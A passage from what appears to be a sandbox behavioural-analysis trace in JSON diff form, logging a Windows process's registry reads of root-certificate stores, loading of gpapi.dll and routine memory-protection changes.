"ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "DF3C24F9BFD666761B268073FE06D1CC8D4F82A4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4" + } + ], + "repeated": 0, + "id": 2088 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob" + } + ], + "repeated": 1, + "id": 2089 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x14\\xc3\\xbd5I\\xee\"Z\\xec\\xe174\\xad\\x8c\\xa0\\xb8\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdf<$\\xf9\\xbf\\xd6fv\\x1b&\\x80s\\xfe\\x06\\xd1\\xcc\\x8dO\\x82\\xa4~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x80\\xc8+h\\x86\\xd7\\x01\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\xc3\\x0b\\xc9tiU`\\xa2\\xf0\t\neEUl\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00N\"T \\x18\\x95\\xe6\\xe3n\\xe6\\x0f\\xfa\\xfa\\xb9\\x12\\xed\\x06\\x17\\x8f9b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xcb<\\xcb\\xb7`1\\xe5\\xe0\\x13\\x8f\\x8d\\xd3\\x9a#\\xf9\\xdeG\\xff\\xc3^C\\xc1\\x14L\\xea'\\xd4jZ\\xb1\\xcb_\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x002\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00KN\\xb4\\xb0t)\\x8b\\x82\\x8b\\\\x000\\x95\\xa1\\x0bE#\\xfb\\x95\\x1c\\x0c\\x884\\x8b\t\\xc5>[\\xab\\xa4\\x08\\xa3\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe4\\xa6\\x8a\\xc8T\\xacRBF\n\\xfdrH\\x1b*D \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x92\\x03\\x00\\x000\\x82\\x03\\x8e" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob" + } + ], + "repeated": 0, + "id": 2090 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2091 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000058c" + } + ], + "repeated": 0, + "id": 2092 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\CRLs" + } + ], + "repeated": 0, + "id": 2093 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2094 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000058c" + } + ], + "repeated": 0, + "id": 2095 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\CTLs" + } + ], + "repeated": 0, + "id": 2096 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2097 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000058c" + } + ], + "repeated": 0, + "id": 2098 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770410cf", + "parentcaller": "0x7703f069", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "gpapi.dll" + } + ], + "repeated": 0, + "id": 2099 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704216c", + "parentcaller": "0x77042076", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\gpapi.dll" + } + ], + "repeated": 0, + "id": 2100 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704e68c", + "parentcaller": "0x7704e202", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000598" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\gpapi.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 2101 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704e6c9", + "parentcaller": "0x7704e202", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000598" + } + ], + "repeated": 0, + "id": 2102 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704125c", + "parentcaller": "0x770413c7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000059c" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74300000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x0001e000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2103 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704003f", + "parentcaller": "0x770407c4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7431a000" + }, + { + "name": "ModuleName", + "value": "gpapi.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2104 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x77051ed8", + "parentcaller": "0x77051e61", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2105 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x77051ed8", + "parentcaller": "0x77051e91", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2106 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x77029d8b", + "parentcaller": "0x7703b4d0", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74318000" + }, + { + "name": "ModuleName", + "value": "gpapi.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2107 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704e71d", + "parentcaller": "0x7704e202", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000059c" + } + ], + "repeated": 0, + "id": 2108 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7704e725", + "parentcaller": "0x7704e202", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000598" + } + ], + "repeated": 0, + "id": 2109 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x77040d40", + "parentcaller": "0x7702e4d3", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74318000" + }, + { + "name": "ModuleName", + "value": "gpapi.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2110 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x77040f1a", + "parentcaller": "0x77040d62", + "category": "process", + "api": "NtSetInformationProcess", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessInformationClass", + "value": "35" + }, + { + "name": "ProcessInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x009\\xa3u\\x85\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00W\\xe8\t\\x8f\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x0e\\xe7\\x1d\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\;@\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0o\\x97:\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe5N@F\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\r\\x9aVx\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x185\\x7fO\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00}\\x9e\\xa4+\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x83\\xc2!d\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2111 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2112 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2113 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2114 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269951", + "parentcaller": "0x74268d22", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\gpapi.dll" + } + ], + "repeated": 0, + "id": 2115 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269990", + "parentcaller": "0x74268d22", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000598" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\gpapi.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 2116 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000598" + } + ], + "repeated": 0, + "id": 2117 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\gpapi" + }, + { + "name": "DllBase", + "value": "0x74300000" + } + ], + "repeated": 0, + "id": 2118 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703dda2", + "parentcaller": "0x770418a3", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\gpapi" + }, + { + "name": "BaseAddress", + "value": "0x74300000" + }, + { + "name": "InitRoutine", + "value": "0x743095f0" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 2119 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x757a6000" + }, + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2120 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x757a6000" + }, + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2121 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2122 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics" + } + ], + "repeated": 0, + "id": 2123 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2124 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000598" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" + } + ], + "repeated": 0, + "id": 2125 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000598" + }, + { + "name": "ValueName", + "value": "UserenvDebugLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel" + } + ], + "repeated": 0, + "id": 2126 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74308c1c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000598" + } + ], + "repeated": 0, + "id": 2127 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2128 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000598" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\Windows\\System" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\System" + } + ], + "repeated": 0, + "id": 2129 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000598" + }, + { + "name": "ValueName", + "value": "GpSvcDebugLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel" + } + ], + "repeated": 0, + "id": 2130 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74308c7a", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000598" + } + ], + "repeated": 0, + "id": 2131 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2132 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000598" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\Setup" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\Setup" + } + ], + "repeated": 0, + "id": 2133 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": 